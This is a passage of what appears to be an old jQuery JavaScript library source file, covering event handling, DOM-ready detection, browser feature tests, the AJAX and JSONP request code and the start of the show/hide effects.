			event = typeof event === "object" ?
				// jQuery.Event object
				event[expando] ? event :
				// Object literal
				jQuery.extend( jQuery.Event(type), event ) :
				// Just the event type (string)
				jQuery.Event(type);

			if ( type.indexOf("!") >= 0 ) {
				event.type = type = type.slice(0, -1);
				event.exclusive = true;
			}

			// Handle a global trigger
			if ( !elem ) {
				// Don't bubble custom events when global (to avoid too much overhead)
				event.stopPropagation();
				// Only trigger if we've ever bound an event for it
				if ( this.global[type] )
					jQuery.each( jQuery.cache, function(){
						if ( this.events && this.events[type] )
							jQuery.event.trigger( event, data, this.handle.elem );
					});
			}

			// Handle triggering a single element

			// don't do events on text and comment nodes
			if ( !elem || elem.nodeType == 3 || elem.nodeType == 8 )
				return undefined;
			
			// Clean up in case it is reused
			event.result = undefined;
			event.target = elem;
			
			// Clone the incoming data, if any
			data = jQuery.makeArray(data);
			data.unshift( event );
		}

		event.currentTarget = elem;

		// Trigger the event, it is assumed that "handle" is a function
		var handle = jQuery.data(elem, "handle");
		if ( handle )
			handle.apply( elem, data );

		// Handle triggering native .onfoo handlers (and on links since we don't call .click() for links)
		if ( (!elem[type] || (jQuery.nodeName(elem, 'a') && type == "click")) && elem["on"+type] && elem["on"+type].apply( elem, data ) === false )
			event.result = false;

		// Trigger the native events (except for clicks on links)
		if ( !bubbling && elem[type] && !event.isDefaultPrevented() && !(jQuery.nodeName(elem, 'a') && type == "click") ) {
			this.triggered = true;
			try {
				elem[ type ]();
			// prevent IE from throwing an error for some hidden elements
			} catch (e) {}
		}

		this.triggered = false;

		if ( !event.isPropagationStopped() ) {
			var parent = elem.parentNode || elem.ownerDocument;
			if ( parent )
				jQuery.event.trigger(event, data, parent, true);
		}
	},

	handle: function(event) {
		// returned undefined or false
		var all, handlers;

		event = arguments[0] = jQuery.event.fix( event || window.event );
		event.currentTarget = this;
		
		// Namespaced event handlers
		var namespaces = event.type.split(".");
		event.type = namespaces.shift();

		// Cache this now, all = true means, any handler
		all = !namespaces.length && !event.exclusive;
		
		var namespace = RegExp("(^|\\.)" + namespaces.slice().sort().join(".*\\.") + "(\\.|$)");

		handlers = ( jQuery.data(this, "events") || {} )[event.type];

		for ( var j in handlers ) {
			var handler = handlers[j];

			// Filter the functions by class
			if ( all || namespace.test(handler.type) ) {
				// Pass in a reference to the handler function itself
				// So that we can later remove it
				event.handler = handler;
				event.data = handler.data;

				var ret = handler.apply(this, arguments);

				if( ret !== undefined ){
					event.result = ret;
					if ( ret === false ) {
						event.preventDefault();
						event.stopPropagation();
					}
				}

				if( event.isImmediatePropagationStopped() )
					break;

			}
		}
	},

	props: "altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode metaKey newValue originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),

	fix: function(event) {
		if ( event[expando] )
			return event;

		// store a copy of the original event object
		// and "clone" to set read-only properties
		var originalEvent = event;
		event = jQuery.Event( originalEvent );

		for ( var i = this.props.length, prop; i; ){
			prop = this.props[ --i ];
			event[ prop ] = originalEvent[ prop ];
		}

		// Fix target property, if necessary
		if ( !event.target )
			event.target = event.srcElement || document; // Fixes #1925 where srcElement might not be defined either

		// check if target is a textnode (safari)
		if ( event.target.nodeType == 3 )
			event.target = event.target.parentNode;

		// Add relatedTarget, if necessary
		if ( !event.relatedTarget && event.fromElement )
			event.relatedTarget = event.fromElement == event.target ? event.toElement : event.fromElement;

		// Calculate pageX/Y if missing and clientX/Y available
		if ( event.pageX == null && event.clientX != null ) {
			var doc = document.documentElement, body = document.body;
			event.pageX = event.clientX + (doc && doc.scrollLeft || body && body.scrollLeft || 0) - (doc.clientLeft || 0);
			event.pageY = event.clientY + (doc && doc.scrollTop || body && body.scrollTop || 0) - (doc.clientTop || 0);
		}

		// Add which for key events
		if ( !event.which && ((event.charCode || event.charCode === 0) ? event.charCode : event.keyCode) )
			event.which = event.charCode || event.keyCode;

		// Add metaKey to non-Mac browsers (use ctrl for PC's and Meta for Macs)
		if ( !event.metaKey && event.ctrlKey )
			event.metaKey = event.ctrlKey;

		// Add which for click: 1 == left; 2 == middle; 3 == right
		// Note: button is not normalized, so don't use it
		if ( !event.which && event.button )
			event.which = (event.button & 1 ? 1 : ( event.button & 2 ? 3 : ( event.button & 4 ? 2 : 0 ) ));

		return event;
	},

	proxy: function( fn, proxy ){
		proxy = proxy || function(){ return fn.apply(this, arguments); };
		// Set the guid of unique handler to the same of original handler, so it can be removed
		proxy.guid = fn.guid = fn.guid || proxy.guid || this.guid++;
		// So proxy can be declared as an argument
		return proxy;
	},

	special: {
		ready: {
			// Make sure the ready event is setup
			setup: bindReady,
			teardown: function() {}
		}
	},
	
	specialAll: {
		live: {
			setup: function( selector, namespaces ){
				jQuery.event.add( this, namespaces[0], liveHandler );
			},
			teardown:  function( namespaces ){
				if ( namespaces.length ) {
					var remove = 0, name = RegExp("(^|\\.)" + namespaces[0] + "(\\.|$)");
					
					jQuery.each( (jQuery.data(this, "events").live || {}), function(){
						if ( name.test(this.type) )
							remove++;
					});
					
					if ( remove < 1 )
						jQuery.event.remove( this, namespaces[0], liveHandler );
				}
			}
		}
	}
};

jQuery.Event = function( src ){
	// Allow instantiation without the 'new' keyword
	if( !this.preventDefault )
		return new jQuery.Event(src);
	
	// Event object
	if( src && src.type ){
		this.originalEvent = src;
		this.type = src.type;
	// Event type
	}else
		this.type = src;

	// timeStamp is buggy for some events on Firefox(#3843)
	// So we won't rely on the native value
	this.timeStamp = now();
	
	// Mark it as fixed
	this[expando] = true;
};

function returnFalse(){
	return false;
}
function returnTrue(){
	return true;
}

// jQuery.Event is based on DOM3 Events as specified by the ECMAScript Language Binding
// http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html
jQuery.Event.prototype = {
	preventDefault: function() {
		this.isDefaultPrevented = returnTrue;

		var e = this.originalEvent;
		if( !e )
			return;
		// if preventDefault exists run it on the original event
		if (e.preventDefault)
			e.preventDefault();
		// otherwise set the returnValue property of the original event to false (IE)
		e.returnValue = false;
	},
	stopPropagation: function() {
		this.isPropagationStopped = returnTrue;

		var e = this.originalEvent;
		if( !e )
			return;
		// if stopPropagation exists run it on the original event
		if (e.stopPropagation)
			e.stopPropagation();
		// otherwise set the cancelBubble property of the original event to true (IE)
		e.cancelBubble = true;
	},
	stopImmediatePropagation:function(){
		this.isImmediatePropagationStopped = returnTrue;
		this.stopPropagation();
	},
	isDefaultPrevented: returnFalse,
	isPropagationStopped: returnFalse,
	isImmediatePropagationStopped: returnFalse
};
// Checks if an event happened on an element within another element
// Used in jQuery.event.special.mouseenter and mouseleave handlers
var withinElement = function(event) {
	// Check if mouse(over|out) are still within the same parent element
	var parent = event.relatedTarget;
	// Traverse up the tree
	while ( parent && parent != this )
		try { parent = parent.parentNode; }
		catch(e) { parent = this; }
	
	if( parent != this ){
		// set the correct event type
		event.type = event.data;
		// handle event if we actually just moused on to a non sub-element
		jQuery.event.handle.apply( this, arguments );
	}
};
	
jQuery.each({ 
	mouseover: 'mouseenter', 
	mouseout: 'mouseleave'
}, function( orig, fix ){
	jQuery.event.special[ fix ] = {
		setup: function(){
			jQuery.event.add( this, orig, withinElement, fix );
		},
		teardown: function(){
			jQuery.event.remove( this, orig, withinElement );
		}
	};			   
});

jQuery.fn.extend({
	bind: function( type, data, fn ) {
		return type == "unload" ? this.one(type, data, fn) : this.each(function(){
			jQuery.event.add( this, type, fn || data, fn && data );
		});
	},

	one: function( type, data, fn ) {
		var one = jQuery.event.proxy( fn || data, function(event) {
			jQuery(this).unbind(event, one);
			return (fn || data).apply( this, arguments );
		});
		return this.each(function(){
			jQuery.event.add( this, type, one, fn && data);
		});
	},

	unbind: function( type, fn ) {
		return this.each(function(){
			jQuery.event.remove( this, type, fn );
		});
	},

	trigger: function( type, data ) {
		return this.each(function(){
			jQuery.event.trigger( type, data, this );
		});
	},

	triggerHandler: function( type, data ) {
		if( this[0] ){
			var event = jQuery.Event(type);
			event.preventDefault();
			event.stopPropagation();
			jQuery.event.trigger( event, data, this[0] );
			return event.result;
		}		
	},

	toggle: function( fn ) {
		// Save reference to arguments for access in closure
		var args = arguments, i = 1;

		// link all the functions, so any of them can unbind this click handler
		while( i < args.length )
			jQuery.event.proxy( fn, args[i++] );

		return this.click( jQuery.event.proxy( fn, function(event) {
			// Figure out which function to execute
			this.lastToggle = ( this.lastToggle || 0 ) % i;

			// Make sure that clicks stop
			event.preventDefault();

			// and execute the function
			return args[ this.lastToggle++ ].apply( this, arguments ) || false;
		}));
	},

	hover: function(fnOver, fnOut) {
		return this.mouseenter(fnOver).mouseleave(fnOut);
	},

	ready: function(fn) {
		// Attach the listeners
		bindReady();

		// If the DOM is already ready
		if ( jQuery.isReady )
			// Execute the function immediately
			fn.call( document, jQuery );

		// Otherwise, remember the function for later
		else
			// Add the function to the wait list
			jQuery.readyList.push( fn );

		return this;
	},
	
	live: function( type, fn ){
		var proxy = jQuery.event.proxy( fn );
		proxy.guid += this.selector + type;

		jQuery(document).bind( liveConvert(type, this.selector), this.selector, proxy );

		return this;
	},
	
	die: function( type, fn ){
		jQuery(document).unbind( liveConvert(type, this.selector), fn ? { guid: fn.guid + this.selector + type } : null );
		return this;
	}
});

function liveHandler( event ){
	var check = RegExp("(^|\\.)" + event.type + "(\\.|$)"),
		stop = true,
		elems = [];

	jQuery.each(jQuery.data(this, "events").live || [], function(i, fn){
		if ( check.test(fn.type) ) {
			var elem = jQuery(event.target).closest(fn.data)[0];
			if ( elem )
				elems.push({ elem: elem, fn: fn });
		}
	});

	elems.sort(function(a,b) {
		return jQuery.data(a.elem, "closest") - jQuery.data(b.elem, "closest");
	});
	
	jQuery.each(elems, function(){
		if ( this.fn.call(this.elem, event, this.fn.data) === false )
			return (stop = false);
	});

	return stop;
}

function liveConvert(type, selector){
	return ["live", type, selector.replace(/\./g, "`").replace(/ /g, "|")].join(".");
}

jQuery.extend({
	isReady: false,
	readyList: [],
	// Handle when the DOM is ready
	ready: function() {
		// Make sure that the DOM is not already loaded
		if ( !jQuery.isReady ) {
			// Remember that the DOM is ready
			jQuery.isReady = true;

			// If there are functions bound, to execute
			if ( jQuery.readyList ) {
				// Execute all of them
				jQuery.each( jQuery.readyList, function(){
					this.call( document, jQuery );
				});

				// Reset the list of functions
				jQuery.readyList = null;
			}

			// Trigger any bound ready events
			jQuery(document).triggerHandler("ready");
		}
	}
});

var readyBound = false;

function bindReady(){
	if ( readyBound ) return;
	readyBound = true;

	// Mozilla, Opera and webkit nightlies currently support this event
	if ( document.addEventListener ) {
		// Use the handy event callback
		document.addEventListener( "DOMContentLoaded", function(){
			document.removeEventListener( "DOMContentLoaded", arguments.callee, false );
			jQuery.ready();
		}, false );

	// If IE event model is used
	} else if ( document.attachEvent ) {
		// ensure firing before onload,
		// maybe late but safe also for iframes
		document.attachEvent("onreadystatechange", function(){
			if ( document.readyState === "complete" ) {
				document.detachEvent( "onreadystatechange", arguments.callee );
				jQuery.ready();
			}
		});

		// If IE and not an iframe
		// continually check to see if the document is ready
		if ( document.documentElement.doScroll && window == window.top ) (function(){
			if ( jQuery.isReady ) return;

			try {
				// If IE is used, use the trick by Diego Perini
				// http://javascript.nwbox.com/IEContentLoaded/
				document.documentElement.doScroll("left");
			} catch( error ) {
				setTimeout( arguments.callee, 0 );
				return;
			}

			// and execute any waiting functions
			jQuery.ready();
		})();
	}

	// A fallback to window.onload, that will always work
	jQuery.event.add( window, "load", jQuery.ready );
}

jQuery.each( ("blur,focus,load,resize,scroll,unload,click,dblclick," +
	"mousedown,mouseup,mousemove,mouseover,mouseout,mouseenter,mouseleave," +
	"change,select,submit,keydown,keypress,keyup,error").split(","), function(i, name){

	// Handle event binding
	jQuery.fn[name] = function(fn){
		return fn ? this.bind(name, fn) : this.trigger(name);
	};
});

// Prevent memory leaks in IE
// And prevent errors on refresh with events like mouseover in other browsers
// Window isn't included so as not to unbind existing unload events
jQuery( window ).bind( 'unload', function(){ 
	for ( var id in jQuery.cache )
		// Skip the window
		if ( id != 1 && jQuery.cache[ id ].handle )
			jQuery.event.remove( jQuery.cache[ id ].handle.elem );
}); 
(function(){

	jQuery.support = {};

	var root = document.documentElement,
		script = document.createElement("script"),
		div = document.createElement("div"),
		id = "script" + (new Date).getTime();

	div.style.display = "none";
	div.innerHTML = '   <link/><table></table><a href="/a" style="color:red;float:left;opacity:.5;">a</a><select><option>text</option></select><object><param/></object>';

	var all = div.getElementsByTagName("*"),
		a = div.getElementsByTagName("a")[0];

	// Can't get basic test support
	if ( !all || !all.length || !a ) {
		return;
	}

	jQuery.support = {
		// IE strips leading whitespace when .innerHTML is used
		leadingWhitespace: div.firstChild.nodeType == 3,
		
		// Make sure that tbody elements aren't automatically inserted
		// IE will insert them into empty tables
		tbody: !div.getElementsByTagName("tbody").length,
		
		// Make sure that you can get all elements in an <object> element
		// IE 7 always returns no results
		objectAll: !!div.getElementsByTagName("object")[0]
			.getElementsByTagName("*").length,
		
		// Make sure that link elements get serialized correctly by innerHTML
		// This requires a wrapper element in IE
		htmlSerialize: !!div.getElementsByTagName("link").length,
		
		// Get the style information from getAttribute
		// (IE uses .cssText insted)
		style: /red/.test( a.getAttribute("style") ),
		
		// Make sure that URLs aren't manipulated
		// (IE normalizes it by default)
		hrefNormalized: a.getAttribute("href") === "/a",
		
		// Make sure that element opacity exists
		// (IE uses filter instead)
		opacity: a.style.opacity === "0.5",
		
		// Verify style float existence
		// (IE uses styleFloat instead of cssFloat)
		cssFloat: !!a.style.cssFloat,

		// Will be defined later
		scriptEval: false,
		noCloneEvent: true,
		boxModel: null
	};
	
	script.type = "text/javascript";
	try {
		script.appendChild( document.createTextNode( "window." + id + "=1;" ) );
	} catch(e){}

	root.insertBefore( script, root.firstChild );
	
	// Make sure that the execution of code works by injecting a script
	// tag with appendChild/createTextNode
	// (IE doesn't support this, fails, and uses .text instead)
	if ( window[ id ] ) {
		jQuery.support.scriptEval = true;
		delete window[ id ];
	}

	root.removeChild( script );

	if ( div.attachEvent && div.fireEvent ) {
		div.attachEvent("onclick", function(){
			// Cloning a node shouldn't copy over any
			// bound event handlers (IE does this)
			jQuery.support.noCloneEvent = false;
			div.detachEvent("onclick", arguments.callee);
		});
		div.cloneNode(true).fireEvent("onclick");
	}

	// Figure out if the W3C box model works as expected
	// document.body must exist before we can do this
	jQuery(function(){
		var div = document.createElement("div");
		div.style.width = div.style.paddingLeft = "1px";

		document.body.appendChild( div );
		jQuery.boxModel = jQuery.support.boxModel = div.offsetWidth === 2;
		document.body.removeChild( div ).style.display = 'none';
	});
})();

var styleFloat = jQuery.support.cssFloat ? "cssFloat" : "styleFloat";

jQuery.props = {
	"for": "htmlFor",
	"class": "className",
	"float": styleFloat,
	cssFloat: styleFloat,
	styleFloat: styleFloat,
	readonly: "readOnly",
	maxlength: "maxLength",
	cellspacing: "cellSpacing",
	rowspan: "rowSpan",
	tabindex: "tabIndex"
};
jQuery.fn.extend({
	// Keep a copy of the old load
	_load: jQuery.fn.load,

	load: function( url, params, callback ) {
		if ( typeof url !== "string" )
			return this._load( url );

		var off = url.indexOf(" ");
		if ( off >= 0 ) {
			var selector = url.slice(off, url.length);
			url = url.slice(0, off);
		}

		// Default to a GET request
		var type = "GET";

		// If the second parameter was provided
		if ( params )
			// If it's a function
			if ( jQuery.isFunction( params ) ) {
				// We assume that it's the callback
				callback = params;
				params = null;

			// Otherwise, build a param string
			} else if( typeof params === "object" ) {
				params = jQuery.param( params );
				type = "POST";
			}

		var self = this;

		// Request the remote document
		jQuery.ajax({
			url: url,
			type: type,
			dataType: "html",
			data: params,
			complete: function(res, status){
				// If successful, inject the HTML into all the matched elements
				if ( status == "success" || status == "notmodified" )
					// See if a selector was specified
					self.html( selector ?
						// Create a dummy div to hold the results
						jQuery("<div/>")
							// inject the contents of the document in, removing the scripts
							// to avoid any 'Permission Denied' errors in IE
							.append(res.responseText.replace(/<script(.|\s)*?\/script>/g, ""))

							// Locate the specified elements
							.find(selector) :

						// If not, just inject the full result
						res.responseText );

				if( callback )
					self.each( callback, [res.responseText, status, res] );
			}
		});
		return this;
	},

	serialize: function() {
		return jQuery.param(this.serializeArray());
	},
	serializeArray: function() {
		return this.map(function(){
			return this.elements ? jQuery.makeArray(this.elements) : this;
		})
		.filter(function(){
			return this.name && !this.disabled &&
				(this.checked || /select|textarea/i.test(this.nodeName) ||
					/text|hidden|password|search/i.test(this.type));
		})
		.map(function(i, elem){
			var val = jQuery(this).val();
			return val == null ? null :
				jQuery.isArray(val) ?
					jQuery.map( val, function(val, i){
						return {name: elem.name, value: val};
					}) :
					{name: elem.name, value: val};
		}).get();
	}
});

// Attach a bunch of functions for handling common AJAX events
jQuery.each( "ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","), function(i,o){
	jQuery.fn[o] = function(f){
		return this.bind(o, f);
	};
});

var jsc = now();

jQuery.extend({
  
	get: function( url, data, callback, type ) {
		// shift arguments if data argument was ommited
		if ( jQuery.isFunction( data ) ) {
			callback = data;
			data = null;
		}

		return jQuery.ajax({
			type: "GET",
			url: url,
			data: data,
			success: callback,
			dataType: type
		});
	},

	getScript: function( url, callback ) {
		return jQuery.get(url, null, callback, "script");
	},

	getJSON: function( url, data, callback ) {
		return jQuery.get(url, data, callback, "json");
	},

	post: function( url, data, callback, type ) {
		if ( jQuery.isFunction( data ) ) {
			callback = data;
			data = {};
		}

		return jQuery.ajax({
			type: "POST",
			url: url,
			data: data,
			success: callback,
			dataType: type
		});
	},

	ajaxSetup: function( settings ) {
		jQuery.extend( jQuery.ajaxSettings, settings );
	},

	ajaxSettings: {
		url: location.href,
		global: true,
		type: "GET",
		contentType: "application/x-www-form-urlencoded",
		processData: true,
		async: true,
		/*
		timeout: 0,
		data: null,
		username: null,
		password: null,
		*/
		// Create the request object; Microsoft failed to properly
		// implement the XMLHttpRequest in IE7, so we use the ActiveXObject when it is available
		// This function can be overriden by calling jQuery.ajaxSetup
		xhr:function(){
			return window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
		},
		accepts: {
			xml: "application/xml, text/xml",
			html: "text/html",
			script: "text/javascript, application/javascript",
			json: "application/json, text/javascript",
			text: "text/plain",
			_default: "*/*"
		}
	},

	// Last-Modified header cache for next request
	lastModified: {},

	ajax: function( s ) {
		// Extend the settings, but re-extend 's' so that it can be
		// checked again later (in the test suite, specifically)
		s = jQuery.extend(true, s, jQuery.extend(true, {}, jQuery.ajaxSettings, s));

		var jsonp, jsre = /=\?(&|$)/g, status, data,
			type = s.type.toUpperCase();

		// convert data if not already a string
		if ( s.data && s.processData && typeof s.data !== "string" )
			s.data = jQuery.param(s.data);

		// Handle JSONP Parameter Callbacks
		if ( s.dataType == "jsonp" ) {
			if ( type == "GET" ) {
				if ( !s.url.match(jsre) )
					s.url += (s.url.match(/\?/) ? "&" : "?") + (s.jsonp || "callback") + "=?";
			} else if ( !s.data || !s.data.match(jsre) )
				s.data = (s.data ? s.data + "&" : "") + (s.jsonp || "callback") + "=?";
			s.dataType = "json";
		}

		// Build temporary JSONP function
		if ( s.dataType == "json" && (s.data && s.data.match(jsre) || s.url.match(jsre)) ) {
			jsonp = "jsonp" + jsc++;

			// Replace the =? sequence both in the query string and the data
			if ( s.data )
				s.data = (s.data + "").replace(jsre, "=" + jsonp + "$1");
			s.url = s.url.replace(jsre, "=" + jsonp + "$1");

			// We need to make sure
			// that a JSONP style response is executed properly
			s.dataType = "script";

			// Handle JSONP-style loading
			window[ jsonp ] = function(tmp){
				data = tmp;
				success();
				complete();
				// Garbage collect
				window[ jsonp ] = undefined;
				try{ delete window[ jsonp ]; } catch(e){}
				if ( head )
					head.removeChild( script );
			};
		}

		if ( s.dataType == "script" && s.cache == null )
			s.cache = false;

		if ( s.cache === false && type == "GET" ) {
			var ts = now();
			// try replacing _= if it is there
			var ret = s.url.replace(/(\?|&)_=.*?(&|$)/, "$1_=" + ts + "$2");
			// if nothing was replaced, add timestamp to the end
			s.url = ret + ((ret == s.url) ? (s.url.match(/\?/) ? "&" : "?") + "_=" + ts : "");
		}

		// If data is available, append data to url for get requests
		if ( s.data && type == "GET" ) {
			s.url += (s.url.match(/\?/) ? "&" : "?") + s.data;

			// IE likes to send both get and post data, prevent this
			s.data = null;
		}

		// Watch for a new set of requests
		if ( s.global && ! jQuery.active++ )
			jQuery.event.trigger( "ajaxStart" );

		// Matches an absolute URL, and saves the domain
		var parts = /^(\w+:)?\/\/([^\/?#]+)/.exec( s.url );

		// If we're requesting a remote document
		// and trying to load JSON or Script with a GET
		if ( s.dataType == "script" && type == "GET" && parts
			&& ( parts[1] && parts[1] != location.protocol || parts[2] != location.host )){

			var head = document.getElementsByTagName("head")[0];
			var script = document.createElement("script");
			script.src = s.url;
			if (s.scriptCharset)
				script.charset = s.scriptCharset;

			// Handle Script loading
			if ( !jsonp ) {
				var done = false;

				// Attach handlers for all browsers
				script.onload = script.onreadystatechange = function(){
					if ( !done && (!this.readyState ||
							this.readyState == "loaded" || this.readyState == "complete") ) {
						done = true;
						success();
						complete();

						// Handle memory leak in IE
						script.onload = script.onreadystatechange = null;
						head.removeChild( script );
					}
				};
			}

			head.appendChild(script);

			// We handle everything using the script element injection
			return undefined;
		}

		var requestDone = false;

		// Create the request object
		var xhr = s.xhr();

		// Open the socket
		// Passing null username, generates a login popup on Opera (#2865)
		if( s.username )
			xhr.open(type, s.url, s.async, s.username, s.password);
		else
			xhr.open(type, s.url, s.async);

		// Need an extra try/catch for cross domain requests in Firefox 3
		try {
			// Set the correct header, if data is being sent
			if ( s.data )
				xhr.setRequestHeader("Content-Type", s.contentType);

			// Set the If-Modified-Since header, if ifModified mode.
			if ( s.ifModified )
				xhr.setRequestHeader("If-Modified-Since",
					jQuery.lastModified[s.url] || "Thu, 01 Jan 1970 00:00:00 GMT" );

			// Set header so the called script knows that it's an XMLHttpRequest
			xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");

			// Set the Accepts header for the server, depending on the dataType
			xhr.setRequestHeader("Accept", s.dataType && s.accepts[ s.dataType ] ?
				s.accepts[ s.dataType ] + ", */*" :
				s.accepts._default );
		} catch(e){}

		// Allow custom headers/mimetypes and early abort
		if ( s.beforeSend && s.beforeSend(xhr, s) === false ) {
			// Handle the global AJAX counter
			if ( s.global && ! --jQuery.active )
				jQuery.event.trigger( "ajaxStop" );
			// close opended socket
			xhr.abort();
			return false;
		}

		if ( s.global )
			jQuery.event.trigger("ajaxSend", [xhr, s]);

		// Wait for a response to come back
		var onreadystatechange = function(isTimeout){
			// The request was aborted, clear the interval and decrement jQuery.active
			if (xhr.readyState == 0) {
				if (ival) {
					// clear poll interval
					clearInterval(ival);
					ival = null;
					// Handle the global AJAX counter
					if ( s.global && ! --jQuery.active )
						jQuery.event.trigger( "ajaxStop" );
				}
			// The transfer is complete and the data is available, or the request timed out
			} else if ( !requestDone && xhr && (xhr.readyState == 4 || isTimeout == "timeout") ) {
				requestDone = true;

				// clear poll interval
				if (ival) {
					clearInterval(ival);
					ival = null;
				}

				status = isTimeout == "timeout" ? "timeout" :
					!jQuery.httpSuccess( xhr ) ? "error" :
					s.ifModified && jQuery.httpNotModified( xhr, s.url ) ? "notmodified" :
					"success";

				if ( status == "success" ) {
					// Watch for, and catch, XML document parse errors
					try {
						// process the data (runs the xml through httpData regardless of callback)
						data = jQuery.httpData( xhr, s.dataType, s );
					} catch(e) {
						status = "parsererror";
					}
				}

				// Make sure that the request was successful or notmodified
				if ( status == "success" ) {
					// Cache Last-Modified header, if ifModified mode.
					var modRes;
					try {
						modRes = xhr.getResponseHeader("Last-Modified");
					} catch(e) {} // swallow exception thrown by FF if header is not available

					if ( s.ifModified && modRes )
						jQuery.lastModified[s.url] = modRes;

					// JSONP handles its own success callback
					if ( !jsonp )
						success();
				} else
					jQuery.handleError(s, xhr, status);

				// Fire the complete handlers
				complete();

				if ( isTimeout )
					xhr.abort();

				// Stop memory leaks
				if ( s.async )
					xhr = null;
			}
		};

		if ( s.async ) {
			// don't attach the handler to the request, just poll it instead
			var ival = setInterval(onreadystatechange, 13);

			// Timeout checker
			if ( s.timeout > 0 )
				setTimeout(function(){
					// Check to see if the request is still happening
					if ( xhr && !requestDone )
						onreadystatechange( "timeout" );
				}, s.timeout);
		}

		// Send the data
		try {
			xhr.send(s.data);
		} catch(e) {
			jQuery.handleError(s, xhr, null, e);
		}

		// firefox 1.5 doesn't fire statechange for sync requests
		if ( !s.async )
			onreadystatechange();

		function success(){
			// If a local callback was specified, fire it and pass it the data
			if ( s.success )
				s.success( data, status );

			// Fire the global callback
			if ( s.global )
				jQuery.event.trigger( "ajaxSuccess", [xhr, s] );
		}

		function complete(){
			// Process result
			if ( s.complete )
				s.complete(xhr, status);

			// The request was completed
			if ( s.global )
				jQuery.event.trigger( "ajaxComplete", [xhr, s] );

			// Handle the global AJAX counter
			if ( s.global && ! --jQuery.active )
				jQuery.event.trigger( "ajaxStop" );
		}

		// return XMLHttpRequest to allow aborting the request etc.
		return xhr;
	},

	handleError: function( s, xhr, status, e ) {
		// If a local callback was specified, fire it
		if ( s.error ) s.error( xhr, status, e );

		// Fire the global callback
		if ( s.global )
			jQuery.event.trigger( "ajaxError", [xhr, s, e] );
	},

	// Counter for holding the number of active queries
	active: 0,

	// Determines if an XMLHttpRequest was successful or not
	httpSuccess: function( xhr ) {
		try {
			// IE error sometimes returns 1223 when it should be 204 so treat it as success, see #1450
			return !xhr.status && location.protocol == "file:" ||
				( xhr.status >= 200 && xhr.status < 300 ) || xhr.status == 304 || xhr.status == 1223;
		} catch(e){}
		return false;
	},

	// Determines if an XMLHttpRequest returns NotModified
	httpNotModified: function( xhr, url ) {
		try {
			var xhrRes = xhr.getResponseHeader("Last-Modified");

			// Firefox always returns 200. check Last-Modified date
			return xhr.status == 304 || xhrRes == jQuery.lastModified[url];
		} catch(e){}
		return false;
	},

	httpData: function( xhr, type, s ) {
		var ct = xhr.getResponseHeader("content-type"),
			xml = type == "xml" || !type && ct && ct.indexOf("xml") >= 0,
			data = xml ? xhr.responseXML : xhr.responseText;

		if ( xml && data.documentElement.tagName == "parsererror" )
			throw "parsererror";
			
		// Allow a pre-filtering function to sanitize the response
		// s != null is checked to keep backwards compatibility
		if( s && s.dataFilter )
			data = s.dataFilter( data, type );

		// The filter can actually parse the response
		if( typeof data === "string" ){

			// If the type is "script", eval it in global context
			if ( type == "script" )
				jQuery.globalEval( data );

			// Get the JavaScript object, if JSON is used.
			if ( type == "json" )
				data = window["eval"]("(" + data + ")");
		}
		
		return data;
	},

	// Serialize an array of form elements or a set of
	// key/values into a query string
	param: function( a ) {
		var s = [ ];

		function add( key, value ){
			s[ s.length ] = encodeURIComponent(key) + '=' + encodeURIComponent(value);
		};

		// If an array was passed in, assume that it is an array
		// of form elements
		if ( jQuery.isArray(a) || a.jquery )
			// Serialize the form elements
			jQuery.each( a, function(){
				add( this.name, this.value );
			});

		// Otherwise, assume that it's an object of key/value pairs
		else
			// Serialize the key/values
			for ( var j in a )
				// If the value is an array then the key names need to be repeated
				if ( jQuery.isArray(a[j]) )
					jQuery.each( a[j], function(){
						add( j, this );
					});
				else
					add( j, jQuery.isFunction(a[j]) ? a[j]() : a[j] );

		// Return the resulting serialization
		return s.join("&").replace(/%20/g, "+");
	}

});
var elemdisplay = {},
	timerId,
	fxAttrs = [
		// height animations
		[ "height", "marginTop", "marginBottom", "paddingTop", "paddingBottom" ],
		// width animations
		[ "width", "marginLeft", "marginRight", "paddingLeft", "paddingRight" ],
		// opacity animations
		[ "opacity" ]
	];

function genFx( type, num ){
	var obj = {};
	jQuery.each( fxAttrs.concat.apply([], fxAttrs.slice(0,num)), function(){
		obj[ this ] = type;
	});
	return obj;
}

jQuery.fn.extend({
	show: function(speed,callback){
		if ( speed ) {
			return this.animate( genFx("show", 3), speed, callback);
		} else {
			for ( var i = 0, l = this.length; i < l; i++ ){
				var old = jQuery.data(this[i], "olddisplay");
				
				this[i].style.display = old || "";
				
				if ( jQuery.css(this[i], "display") === "none" ) {
					var tagName = this[i].tagName, display;
					
					if ( elemdisplay[ tagName ] ) {
						display = elemdisplay[ tagName ];
					} else {
						var elem = jQuery("<" + tagName + " />").appendTo("body");
						
						display = elem.css("display");
						if ( display === "none" )
							display = "block";
						
						elem.remove();
						
						elemdisplay[ tagName ] = display;
					}
					
					jQuery.data(this[i], "olddisplay", display);
				}
			}

			// Set the display of the elements in a second loop
			// to avoid the constant reflow
			for ( var i = 0, l = this.length; i < l; i++ ){
				this[i].style.display = jQuery.data(this[i], "olddisplay") || "";
			}
			
			return this;
		}
	},

	hide: function(speed,callback){
		if ( speed ) {
			return this.animate( genFx("hide", 3), speed, callback);
		} else {
			for ( var i = 0, l = this.length; i < l; i++ ){
				var old = jQuery.data(this[i], "olddisplay");
				if ( !old && old !== "none" )
					jQuery.data(this[i], "olddisplay", jQuery.css(this[i], "display"));
			}

			// Set the display of the elements in a second loop
			// to avoid the constant reflow
			for ( var i = 0, l = this.length; i < l; i++ ){
				this[i].style.display = "none";
			}

			return this;
		}
	},

	// Save the old toggle function
	_toggle: jQuery.fn.toggle,

	toggle: function( fn, fn2 ){
		var bool = typeof fn === "boolean";

		return jQuery.isFunction(fn) && jQuery.isFunction(fn2) ?
			this._toggle.apply( this, arguments ) :
			fn == null || bool ?
				this.each(function(){
					var state = bool ? fn : jQuery(this).is(":hidden");
					jQuery(this)[ state ? "show" : "hide" ]();
				}) :
				this.animate(genFx("toggle", 3), fn, fn2);
	},

	fadeTo: function(speed,to,callback){
		return this.animate({opacity: to}, speed, callback);
	},

	animate: function( prop, speed, easing, callback ) {
